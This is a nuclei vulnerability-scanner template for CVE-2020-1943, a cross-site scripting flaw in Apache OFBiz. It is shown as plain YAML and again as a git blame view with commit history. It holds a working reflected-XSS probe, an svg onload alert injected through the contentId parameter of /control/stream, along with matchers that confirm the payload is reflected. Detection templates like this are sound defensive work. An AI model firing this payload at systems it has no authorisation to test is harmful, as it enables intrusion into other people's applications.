nuclei-templates/http/cves/2020/CVE-2020-1943.yaml

id: CVE-2020-1943

info:
  name: Apache OFBiz <=16.11.07 - Cross-Site Scripting
  author: pdteam
  severity: medium
  description: Apache OFBiz 16.11.01 to 16.11.07 is vulnerable to cross-site scripting because data sent with contentId to /control/stream is not sanitized.
  remediation: |
    Upgrade Apache OFBiz to a version higher than 16.11.07 to mitigate this vulnerability.
  reference:
    - https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E
    - https://s.apache.org/pr5u8
    - https://lists.apache.org/thread.html/r034123f2767830169fd04c922afb22d2389de6e2faf3a083207202bc@%3Ccommits.ofbiz.apache.org%3E
    - https://lists.apache.org/thread.html/r8efd5b62604d849ae2f93b2eb9ce0ce0356a4cf5812deed14030a757@%3Cdev.ofbiz.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2020-1943
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-1943
    cwe-id: CWE-79
    epss-score: 0.97315
    epss-percentile: 0.99837
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: ofbiz
  tags: cve,cve2020,apache,xss,ofbiz

http:
  - method: GET
    path:
      - '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<svg/onload=alert(/xss/)>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a00463044022000d8157b5601fb2802bc01848ddc70d15e7e51a8663fdb03bfec0f8d79506d4b02201a51bc9d899c453eb837b7e05535d261768a448396808d656d74d4cb918346c9:922c64590222798bb761d5b6d8e72950
more cves :fire: 2021-01-09 14:45:11 +00:00			`id: CVE-2020-1943`

			`info:`
Dashboard Content Enhancements (#5092) Dashboard Content Enhancements 2022-08-16 14:14:41 +00:00			`name: Apache OFBiz <=16.11.07 - Cross-Site Scripting`
misc tag updates 2021-04-06 06:46:11 +00:00			`author: pdteam`
more cves :fire: 2021-01-09 14:45:11 +00:00			`severity: medium`
Dashboard Content Enhancements (#5092) Dashboard Content Enhancements 2022-08-16 14:14:41 +00:00			`description: Apache OFBiz 16.11.01 to 16.11.07 is vulnerable to cross-site scripting because data sent with contentId to /control/stream is not sanitized.`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`remediation: \|`
			`Upgrade Apache OFBiz to a version higher than 16.11.07 to mitigate this vulnerability.`
Add reference 2021-03-15 17:13:02 +00:00			`reference:`
			`- https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://s.apache.org/pr5u8`
			`- https://lists.apache.org/thread.html/r034123f2767830169fd04c922afb22d2389de6e2faf3a083207202bc@%3Ccommits.ofbiz.apache.org%3E`
			`- https://lists.apache.org/thread.html/r8efd5b62604d849ae2f93b2eb9ce0ce0356a4cf5812deed14030a757@%3Cdev.ofbiz.apache.org%3E`
Dashboard Content Enhancements (#5092) Dashboard Content Enhancements 2022-08-16 14:14:41 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2020-1943`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 6.1`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2020-1943`
			`cwe-id: CWE-79`
templateman update 2023-10-14 11:27:55 +00:00			`epss-score: 0.97315`
TemplateMan Update [Fri Oct 27 16:34:45 UTC 2023] :robot: 2023-10-27 16:34:45 +00:00			`epss-percentile: 0.99837`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`cpe: cpe:2.3:a:apache:ofbiz::::::::`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: apache`
			`product: ofbiz`
			`tags: cve,cve2020,apache,xss,ofbiz`
more cves :fire: 2021-01-09 14:45:11 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
more cves :fire: 2021-01-09 14:45:11 +00:00			`- method: GET`
			`path:`
Fix templates: change alert(xss) to alert(/xss/) (#4564) 2022-06-09 04:41:03 +00:00			`- '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'`
more cves :fire: 2021-01-09 14:45:11 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`part: body`
more cves :fire: 2021-01-09 14:45:11 +00:00			`words:`
Fix templates: change alert(xss) to alert(/xss/) (#4564) 2022-06-09 04:41:03 +00:00			`- "<svg/onload=alert(/xss/)>"`
matcher updates 2021-01-11 06:44:22 +00:00
more cves :fire: 2021-01-09 14:45:11 +00:00			`- type: word`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`part: header`
more cves :fire: 2021-01-09 14:45:11 +00:00			`words:`
matcher updates 2021-01-11 06:44:22 +00:00			`- "text/html"`

			`- type: status`
			`status:`
Updated all templates tags with technologies (#3478) * Updated tags for template sonicwall-email-security-detect.yaml * Updated tags for template detect-sentry.yaml * Updated tags for template kong-detect.yaml * Updated tags for template openam-detect.yaml * Updated tags for template shiro-detect.yaml * Updated tags for template iplanet-web-server.yaml * Updated tags for template graylog-api-browser.yaml * Updated tags for template prtg-detect.yaml * Updated tags for template node-red-detect.yaml * Updated tags for template abyss-web-server.yaml * Updated tags for template geo-webserver.yaml * Updated tags for template autobahn-python-detect.yaml * Updated tags for template default-lighttpd-page.yaml * Updated tags for template microsoft-iis-8.yaml * Updated tags for template lucee-detect.yaml * Updated tags for template php-proxy-detect.yaml * Updated tags for template jenkins-detect.yaml * Updated tags for template cockpit-detect.yaml * Updated tags for template csrfguard-detect.yaml * Updated tags for template dwr-index-detect.yaml * Updated tags for template netsweeper-webadmin-detect.yaml * Updated tags for template weblogic-detect.yaml * Updated tags for template s3-detect.yaml * Updated tags for template tileserver-gl.yaml * Updated tags for template springboot-actuator.yaml * Updated tags for template terraform-detect.yaml * Updated tags for template redmine-cli-detect.yaml * Updated tags for template mrtg-detect.yaml * Updated tags for template tableau-server-detect.yaml * Updated tags for template magmi-detect.yaml * Updated tags for template oidc-detect.yaml * Updated tags for template tor-socks-proxy.yaml * Updated tags for template synology-web-station.yaml * Updated tags for template herokuapp-detect.yaml * Updated tags for template gunicorn-detect.yaml * Updated tags for template sql-server-reporting.yaml * Updated tags for template google-bucket-service.yaml * Updated tags for template kubernetes-mirantis.yaml * Updated tags for template kubernetes-enterprise-manager.yaml * Updated tags for template oracle-iplanet-web-server.yaml * Updated tags for template dell-idrac7-detect.yaml * Updated tags for template dell-idrac6-detect.yaml * Updated tags for template dell-idrac9-detect.yaml * Updated tags for template dell-idrac8-detect.yaml * Updated tags for template apache-guacamole.yaml * Updated tags for template aws-cloudfront-service.yaml * Updated tags for template aws-bucket-service.yaml * Updated tags for template nginx-linux-page.yaml * Updated tags for template telerik-fileupload-detect.yaml * Updated tags for template telerik-dialoghandler-detect.yaml * Updated tags for template htaccess-config.yaml * Updated tags for template microsoft-azure-error.yaml * Updated tags for template detect-options-method.yaml * Updated tags for template unpatched-coldfusion.yaml * Updated tags for template moodle-changelog.yaml * Updated tags for template detect-dns-over-https.yaml * Updated tags for template CVE-2019-19134.yaml * Updated tags for template CVE-2019-3929.yaml * Updated tags for template CVE-2019-19908.yaml * Updated tags for template CVE-2019-10475.yaml * Updated tags for template CVE-2019-17382.yaml * Updated tags for template CVE-2019-16332.yaml * Updated tags for template CVE-2019-14974.yaml * Updated tags for template CVE-2019-19368.yaml * Updated tags for template CVE-2019-12725.yaml * Updated tags for template CVE-2019-15501.yaml * Updated tags for template CVE-2019-9733.yaml * Updated tags for template CVE-2019-14322.yaml * Updated tags for template CVE-2019-9955.yaml * Updated tags for template CVE-2019-0230.yaml * Updated tags for template CVE-2019-10232.yaml * Updated tags for template CVE-2019-17506.yaml * Updated tags for template CVE-2019-8449.yaml * Updated tags for template CVE-2019-12593.yaml * Updated tags for template CVE-2019-10092.yaml * Updated tags for template CVE-2019-1821.yaml * Updated tags for template CVE-2019-3401.yaml * Updated tags for template CVE-2019-16662.yaml * Updated tags for template CVE-2019-5418.yaml * Updated tags for template CVE-2016-4975.yaml * Updated tags for template CVE-2016-1000137.yaml * Updated tags for template CVE-2016-7552.yaml * Updated tags for template CVE-2016-10956.yaml * Updated tags for template CVE-2016-1000146.yaml * Updated tags for template CVE-2013-2251.yaml * Updated tags for template CVE-2013-1965.yaml * Updated tags for template CVE-2014-2323.yaml * Updated tags for template CVE-2014-5111.yaml * Updated tags for template CVE-2014-2962.yaml * Updated tags for template CVE-2014-4561.yaml * Updated tags for template CVE-2014-4558.yaml * Updated tags for template CVE-2014-3120.yaml * Updated tags for template CVE-2007-5728.yaml * Updated tags for template CVE-2009-4679.yaml * Updated tags for template CVE-2009-1558.yaml * Updated tags for template CVE-2009-4202.yaml * Updated tags for template CVE-2009-0932.yaml * Updated tags for template CVE-2015-2068.yaml * Updated tags for template CVE-2015-8813.yaml * Updated tags for template CVE-2015-7450.yaml * Updated tags for template CVE-2015-2067.yaml * Updated tags for template CVE-2015-3306.yaml * Updated tags for template CVE-2015-3337.yaml * Updated tags for template CVE-2015-1427.yaml * Updated tags for template CVE-2015-1503.yaml * Updated tags for template CVE-2015-1880.yaml * Updated tags for template CVE-2018-3810.yaml * Updated tags for template CVE-2018-18069.yaml * Updated tags for template CVE-2018-17246.yaml * Updated tags for template CVE-2018-10141.yaml * Updated tags for template CVE-2018-16341.yaml * Updated tags for template CVE-2018-18777.yaml * Updated tags for template CVE-2018-15138.yaml * Updated tags for template CVE-2018-11784.yaml * Updated tags for template CVE-2018-16299.yaml * Updated tags for template CVE-2018-7251.yaml * Updated tags for template CVE-2018-1273.yaml * Updated tags for template CVE-2018-1271.yaml * Updated tags for template CVE-2018-11759.yaml * Updated tags for template CVE-2018-3167.yaml * Updated tags for template CVE-2018-7490.yaml * Updated tags for template CVE-2018-2628.yaml * Updated tags for template CVE-2018-13380.yaml * Updated tags for template CVE-2018-2893.yaml * Updated tags for template CVE-2018-5316.yaml * Updated tags for template CVE-2018-20985.yaml * Updated tags for template CVE-2018-10818.yaml * Updated tags for template CVE-2018-1000861.yaml * Updated tags for template CVE-2018-0296.yaml * Updated tags for template CVE-2018-19458.yaml * Updated tags for template CVE-2018-3760.yaml * Updated tags for template CVE-2018-12998.yaml * Updated tags for template CVE-2018-9118.yaml * Updated tags for template CVE-2018-1000130.yaml * Updated tags for template CVE-2008-6668.yaml * Updated tags for template CVE-2017-7269.yaml * Updated tags for template CVE-2017-1000170.yaml * Updated tags for template CVE-2017-16877.yaml * Updated tags for template CVE-2017-1000486.yaml * Updated tags for template CVE-2017-9822.yaml * Updated tags for template CVE-2017-0929.yaml * Updated tags for template CVE-2017-7921.yaml * Updated tags for template CVE-2017-14535.yaml * Updated tags for template CVE-2017-5521.yaml * Updated tags for template CVE-2017-12637.yaml * Updated tags for template CVE-2017-12635.yaml * Updated tags for template CVE-2017-11610.yaml * Updated tags for template CVE-2021-20114.yaml * Updated tags for template CVE-2021-40856.yaml * Updated tags for template CVE-2021-21972.yaml * Updated tags for template CVE-2021-31602.yaml * Updated tags for template CVE-2021-41773.yaml * Updated tags for template CVE-2021-37704.yaml * Updated tags for template CVE-2021-45046.yaml * Updated tags for template CVE-2021-26084.yaml * Updated tags for template CVE-2021-27931.yaml * Updated tags for template CVE-2021-24291.yaml * Updated tags for template CVE-2021-41648.yaml * Updated tags for template CVE-2021-37216.yaml * Updated tags for template CVE-2021-22005.yaml * Updated tags for template CVE-2021-37573.yaml * Updated tags for template CVE-2021-31755.yaml * Updated tags for template CVE-2021-43287.yaml * Updated tags for template CVE-2021-24274.yaml * Updated tags for template CVE-2021-33564.yaml * Updated tags for template CVE-2021-22145.yaml * Updated tags for template CVE-2021-24237.yaml * Updated tags for template CVE-2021-44848.yaml * Updated tags for template CVE-2021-25646.yaml * Updated tags for template CVE-2021-21816.yaml * Updated tags for template CVE-2021-41649.yaml * Updated tags for template CVE-2021-41291.yaml * Updated tags for template CVE-2021-41293.yaml * Updated tags for template CVE-2021-21801.yaml * Updated tags for template CVE-2021-29156.yaml * Updated tags for template CVE-2021-34370.yaml * Updated tags for template CVE-2021-27132.yaml * Updated tags for template CVE-2021-28151.yaml * Updated tags for template CVE-2021-26812.yaml * Updated tags for template CVE-2021-21985.yaml * Updated tags for template CVE-2021-43778.yaml * Updated tags for template CVE-2021-25281.yaml * Updated tags for template CVE-2021-40539.yaml * Updated tags for template CVE-2021-36749.yaml * Updated tags for template CVE-2021-21234.yaml * Updated tags for template CVE-2021-33221.yaml * Updated tags for template CVE-2021-42013.yaml * Updated tags for template CVE-2021-33807.yaml * Updated tags for template CVE-2021-44228.yaml * Updated tags for template CVE-2012-0896.yaml * Updated tags for template CVE-2012-0991.yaml * Updated tags for template CVE-2012-0392.yaml * Updated tags for template CVE-2012-4940.yaml * Updated tags for template CVE-2012-1226.yaml * Updated tags for template CVE-2012-4878.yaml * Updated tags for template CVE-2010-1304.yaml * Updated tags for template CVE-2010-1217.yaml * Updated tags for template CVE-2010-0759.yaml * Updated tags for template CVE-2010-2307.yaml * Updated tags for template CVE-2010-4231.yaml * Updated tags for template CVE-2010-2861.yaml * Updated tags for template CVE-2010-4282.yaml * Updated tags for template CVE-2010-1302.yaml * Updated tags for template CVE-2010-1461.yaml * Updated tags for template CVE-2020-4463.yaml * Updated tags for template CVE-2020-1943.yaml * Updated tags for template CVE-2020-36289.yaml * Updated tags for template CVE-2020-17518.yaml * Updated tags for template CVE-2020-12800.yaml * Updated tags for template CVE-2020-10770.yaml * Updated tags for template CVE-2020-17506.yaml * Updated tags for template CVE-2020-11547.yaml * Updated tags for template CVE-2020-11034.yaml * Updated tags for template CVE-2020-24589.yaml * Updated tags for template CVE-2020-9054.yaml * Updated tags for template CVE-2020-28976.yaml * Updated tags for template CVE-2020-16952.yaml * Updated tags for template CVE-2020-24312.yaml * Updated tags for template CVE-2020-8512.yaml * Updated tags for template CVE-2020-14179.yaml * Updated tags for template CVE-2020-6308.yaml * Updated tags for template CVE-2020-35846.yaml * Updated tags for template CVE-2020-7318.yaml * Updated tags for template CVE-2020-2140.yaml * Updated tags for template CVE-2020-5410.yaml * Updated tags for template CVE-2020-5777.yaml * Updated tags for template CVE-2020-13700.yaml * Updated tags for template CVE-2020-5775.yaml * Updated tags for template CVE-2020-13167.yaml * Updated tags for template CVE-2020-35848.yaml * Updated tags for template CVE-2020-9484.yaml * Updated tags for template CVE-2020-15505.yaml * Updated tags for template CVE-2020-9047.yaml * Updated tags for template CVE-2020-17519.yaml * Updated tags for template CVE-2020-17505.yaml * Updated tags for template CVE-2020-9376.yaml * Updated tags for template CVE-2020-8497.yaml * Updated tags for template CVE-2020-14092.yaml * Updated tags for template CVE-2020-10148.yaml * Updated tags for template CVE-2020-35847.yaml * Updated tags for template CVE-2020-12116.yaml * Updated tags for template CVE-2020-11930.yaml * Updated tags for template CVE-2020-24186.yaml * Updated tags for template CVE-2020-9496.yaml * Updated tags for template CVE-2020-35489.yaml * Updated tags for template CVE-2020-26413.yaml * Updated tags for template CVE-2020-2096.yaml * misc updates * misc update * more updates Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-01-04 19:34:16 +00:00			`- 200`
Auto Template Signing [Sat Oct 28 07:54:29 UTC 2023] :robot: 2023-10-28 07:54:29 +00:00			`# digest: 490a00463044022000d8157b5601fb2802bc01848ddc70d15e7e51a8663fdb03bfec0f8d79506d4b02201a51bc9d899c453eb837b7e05535d261768a448396808d656d74d4cb918346c9:922c64590222798bb761d5b6d8e72950`